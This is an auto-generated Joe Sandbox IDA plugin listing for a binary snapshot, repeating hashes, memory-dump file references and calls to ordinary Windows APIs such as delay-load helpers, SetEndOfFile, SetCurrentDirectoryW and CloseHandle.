                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: e06abfeb9f6cfad37cdc23814633daac759f78595dd9fd81de42a0d176e34cbe
                                                                                                                                                                                              • Instruction ID: 8236b2246d813820945f23ca4ebd7a5bee524279ed3f4941a9477099377fc7a4
                                                                                                                                                                                              • Opcode Fuzzy Hash: e06abfeb9f6cfad37cdc23814633daac759f78595dd9fd81de42a0d176e34cbe
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FA011E22A8002BC300822022C02CFB028EC0C0B20338882EF80A800C0A88088003CB3
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 007940b5afec130a5315dc929d6311da63d987ae2f59fe9d0a2210febda72bc9
                                                                                                                                                                                              • Instruction ID: 8236b2246d813820945f23ca4ebd7a5bee524279ed3f4941a9477099377fc7a4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 007940b5afec130a5315dc929d6311da63d987ae2f59fe9d0a2210febda72bc9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FA011E22A8002BC300822022C02CFB028EC0C0B20338882EF80A800C0A88088003CB3
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 1be4b995db0d26f6ae8dd6148dc2f78a83c076770bf3ea508b848056c660a4d5
                                                                                                                                                                                              • Instruction ID: 8236b2246d813820945f23ca4ebd7a5bee524279ed3f4941a9477099377fc7a4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1be4b995db0d26f6ae8dd6148dc2f78a83c076770bf3ea508b848056c660a4d5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FA011E22A8002BC300822022C02CFB028EC0C0B20338882EF80A800C0A88088003CB3
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE3FC
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 5da8acc5aa1570816a22d36aa34a78693ae226c29ef1657dd7d0c4c3e5f26d20
                                                                                                                                                                                              • Instruction ID: 8236b2246d813820945f23ca4ebd7a5bee524279ed3f4941a9477099377fc7a4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5da8acc5aa1570816a22d36aa34a78693ae226c29ef1657dd7d0c4c3e5f26d20
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FA011E22A8002BC300822022C02CFB028EC0C0B20338882EF80A800C0A88088003CB3
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE580
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 34cabe0900e3da4be2f54e91325a4517546b9841fc5b56db079f9df83fc06081
                                                                                                                                                                                              • Instruction ID: 5fabdfa3beb15e1f33e89add7104b824ed160c62c0fb6a6e965a0d5607a01fdd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 34cabe0900e3da4be2f54e91325a4517546b9841fc5b56db079f9df83fc06081
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FA011C22A8002BC300822A22C02CFB020EC8C0B20338882FF80AC00C0A88088203CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE580
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: a7aa77c7d4dd5bccb9a58e7325d2ae1a5b1632eaec0427408aa7c1aba9aba62f
                                                                                                                                                                                              • Instruction ID: 5fabdfa3beb15e1f33e89add7104b824ed160c62c0fb6a6e965a0d5607a01fdd
                                                                                                                                                                                              • Opcode Fuzzy Hash: a7aa77c7d4dd5bccb9a58e7325d2ae1a5b1632eaec0427408aa7c1aba9aba62f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FA011C22A8002BC300822A22C02CFB020EC8C0B20338882FF80AC00C0A88088203CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE580
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: aeb76566d862076f70dec2518d7bb880bd2794d54f76671d530ba90122adcef0
                                                                                                                                                                                              • Instruction ID: 7b6d4f3a16fa59a6b3194a61b96a9fd7b4050b570a0b14925a7b66606a226adb
                                                                                                                                                                                              • Opcode Fuzzy Hash: aeb76566d862076f70dec2518d7bb880bd2794d54f76671d530ba90122adcef0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 93A011C22A80023C300822A22C02CFB020EC8C0B22338822FF808C00C0A88088203CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: fae906150e1b278a92f683225a94c4e77dba710bc4613da4b1bd3786a50a5dd8
                                                                                                                                                                                              • Instruction ID: 3bd4163507a5ef9dbf2d36f797a2ab03148be8da10a4dc6e432a04d481a90ed1
                                                                                                                                                                                              • Opcode Fuzzy Hash: fae906150e1b278a92f683225a94c4e77dba710bc4613da4b1bd3786a50a5dd8
                                                                                                                                                                                              • Instruction Fuzzy Hash: CAA011C22A8802BC300822022C02CFB020EC0C2F203388A2EF80AC0080A8808C003CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: d7cf7666b3b616bf148082f0484194177f33fcca3e0e9970739f6844b2f3dfa7
                                                                                                                                                                                              • Instruction ID: 3bd4163507a5ef9dbf2d36f797a2ab03148be8da10a4dc6e432a04d481a90ed1
                                                                                                                                                                                              • Opcode Fuzzy Hash: d7cf7666b3b616bf148082f0484194177f33fcca3e0e9970739f6844b2f3dfa7
                                                                                                                                                                                              • Instruction Fuzzy Hash: CAA011C22A8802BC300822022C02CFB020EC0C2F203388A2EF80AC0080A8808C003CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: 6aea5d2ff52eed79c609d6eaac89c139ef976dc141d45bab5943c8558b38dd21
                                                                                                                                                                                              • Instruction ID: 3bd4163507a5ef9dbf2d36f797a2ab03148be8da10a4dc6e432a04d481a90ed1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6aea5d2ff52eed79c609d6eaac89c139ef976dc141d45bab5943c8558b38dd21
                                                                                                                                                                                              • Instruction Fuzzy Hash: CAA011C22A8802BC300822022C02CFB020EC0C2F203388A2EF80AC0080A8808C003CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                              • Opcode ID: d97300a567145ade0b8177f6b9f7d027649d8e7f9430b2431d377a3f3e915e33
                                                                                                                                                                                              • Instruction ID: 3bd4163507a5ef9dbf2d36f797a2ab03148be8da10a4dc6e432a04d481a90ed1
                                                                                                                                                                                              • Opcode Fuzzy Hash: d97300a567145ade0b8177f6b9f7d027649d8e7f9430b2431d377a3f3e915e33
                                                                                                                                                                                              • Instruction Fuzzy Hash: CAA011C22A8802BC300822022C02CFB020EC0C2F203388A2EF80AC0080A8808C003CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(?,00FA903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00FA9F0C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 749574446-0
                                                                                                                                                                                              • Opcode ID: 886cc875a295e9ac1b92ad373019760256761f678907cb5713917cac5266f012
                                                                                                                                                                                              • Instruction ID: 27b580f8ea9a033786fd4bd99bb9bab8711d9b81eaec0298de910525fe0acc7a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 886cc875a295e9ac1b92ad373019760256761f678907cb5713917cac5266f012
                                                                                                                                                                                              • Instruction Fuzzy Hash: 11A0223008000E8BCE022B30CE0C00C3B22FB20BC830082E8A00BCF0B2CB23880BEB02
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00FBAE72,C:\Users\user\Desktop,00000000,00FE946A,00000006), ref: 00FBAC08
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1611563598-0
                                                                                                                                                                                              • Opcode ID: 725b02643373b3409448f14157236bd87b75260519b883158c22318233e76ccd
                                                                                                                                                                                              • Instruction ID: 5ed76f5faa4e9a188c5acceb7a583ba5dcfdafac3f78b62a1cc876aee1956157
                                                                                                                                                                                              • Opcode Fuzzy Hash: 725b02643373b3409448f14157236bd87b75260519b883158c22318233e76ccd
                                                                                                                                                                                              • Instruction Fuzzy Hash: C3A011302022028B82002B328F0AA0EBBAAAFA2B00F00C02AA20080030CB30C820BA02
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CloseHandle.KERNELBASE(000000FF,?,?,00FA95D6,?,?,?,?,?,00FD2641,000000FF), ref: 00FA963B
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2962429428-0
